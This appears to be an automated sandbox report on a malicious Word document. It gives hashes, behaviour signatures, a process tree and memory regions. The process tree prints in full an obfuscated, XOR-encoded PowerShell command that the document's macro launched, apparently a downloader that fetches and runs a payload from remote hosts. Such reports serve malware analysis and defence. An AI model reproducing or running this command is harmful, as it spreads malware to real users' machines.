Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    19-05-2024 10:18

General

  • Target

    59e447e4f4dc430a2fa225dda10aeb20_JaffaCakes118.doc

  • Size

    206KB

  • MD5

    59e447e4f4dc430a2fa225dda10aeb20

  • SHA1

    1582f27a27a5ceb1066e50e2ded5088b2dd9c118

  • SHA256

    666edb5d9868c952bd0fa5ed0741e23cd81f0c74832c73186fc6e1304d4e39e1

  • SHA512

    2c3b047038e2af63a45eb0a429f0a3350f4faf42c9be0e70ec82997ac0c50e6466341da5c1347458f995d835a7a3e3899094c7ad1b38e58e79facc39acd4e3f3

  • SSDEEP

    3072:wH9nBf4SuEjAhmAMOc7kkkko1rkGuF3tBInxGGq5fyXJm9YBmjDsl5zZMr:wFVeEsjdXRC3jexGG6kYWofsx0

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\59e447e4f4dc430a2fa225dda10aeb20_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2088
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowersHELL.exe
      PowersHELL .( $shElliD[1]+$ShEllId[13]+'X')( "$(SEt-iteM 'vaRIabLe:oFS' '')"+ [strINg]('30Y84N127S125w7<84Y95N77R23j85S88N80%95w89N78%26N116j95K78w20<109K95<88R121<86R83K95K84j78R1S30S112<83S81R7K29N82w78R78R74K0S21Y21%77w77w77K20K67w95S78j91R84%85R78w82%95N72N73j78%95w76Y95K20S89N85S87S21j98<73N12R110<106w77R84j123%123N112S21S122S82w78j78R74Y0N21<21%92S86<95K77K95S72N20m74R86j21<74K79m88K21m73%3Y3%15K15m12N87%21%122S82S78<78Y74Y0Y21Y21Y77w77S77K20w82%85K78N95<86K89Y91K74N83w78w91R86m20<72N79S21N92m12%124m120<112Y126w21w122R82<78w78j74R0Y21K21<94S89%20%91w87S95w93Y78Y20Y89S85K87%21w77K74<23j89N85Y84%78S95Y84S78Y21j85m121K14Y93N67N14N91Y125R118m21%122<82m78m78%74R0%21K21N77K77K77m20j91Y72R87<91N84<83w78%85j79<72<20K89<85S87K21R81m79j116Y117m75K115w21Y29Y20<105S74m86m83S78S18m29m122K29%19K1S30j82m117j98R26S7K26Y29j8%3<11N29S1K30S86w104Y75N7K30R95m84w76%0S78N95%87w74N17<29N102m29j17S30N82N117w98S17R29%20Y95%66<95S29j1m92Y85%72%95R91m89S82<18%30m126Y98R107%26<83j84w26<30<112S83R81w19j65R78N72K67K65w30j84<127R125N20N126K85m77R84N86<85<91w94Y124N83Y86R95%18Y30R126K98K107S22j26K30N86R104K75K19K1S105j78%91S72m78w23w106w72N85R89R95S73%73N26S30K86Y104%75<1%88S72Y95N91S81S1K71N89w91<78K89N82%65N71<71'-split 'w' -split 'Y'-sPlIt 'K' -sPlIT '<'-sPlIt 'N' -sPLiT 's'-split'r'-SpLit '%' -SPlit 'M'-SPlit 'J'|foREaCH-OBjEct{ [CHar] ( $_-BXOr 0x3a )}) +" $(SEt 'ofs' ' ')")
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2576
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2672

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      374890c0f5cd5e51056603ff37cf608b

      SHA1

      b86e73edeedc72f6a7188145db7461cbb8d034e5

      SHA256

      9e91b0e7e3d0067eb89724846a4567d513a097549adc88d4f6443a2e4785ae42

      SHA512

      ff9a27d4af2e2428bdf307b6d379f1a2e9a858229ca1d3f836bb50202cf46fefa3c77df2d45db66e6592a105653b028740ecfdce26867c145cf06b6612518f4d

    • memory/2088-36-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2088-5-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-6-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-7-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-43-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-8-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-42-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-41-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-15-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-40-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-14-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-79-0x000000007174D000-0x0000000071758000-memory.dmp

      Filesize

      44KB

    • memory/2088-2-0x000000007174D000-0x0000000071758000-memory.dmp

      Filesize

      44KB

    • memory/2088-20-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-28-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-26-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-23-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-32-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-17-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-11-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-37-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-78-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2088-59-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2088-60-0x000000007174D000-0x0000000071758000-memory.dmp

      Filesize

      44KB

    • memory/2088-0-0x000000002FA01000-0x000000002FA02000-memory.dmp

      Filesize

      4KB

    • memory/2576-51-0x00000000054F0000-0x0000000005542000-memory.dmp

      Filesize

      328KB

    • memory/2576-52-0x0000000005470000-0x0000000005485000-memory.dmp

      Filesize

      84KB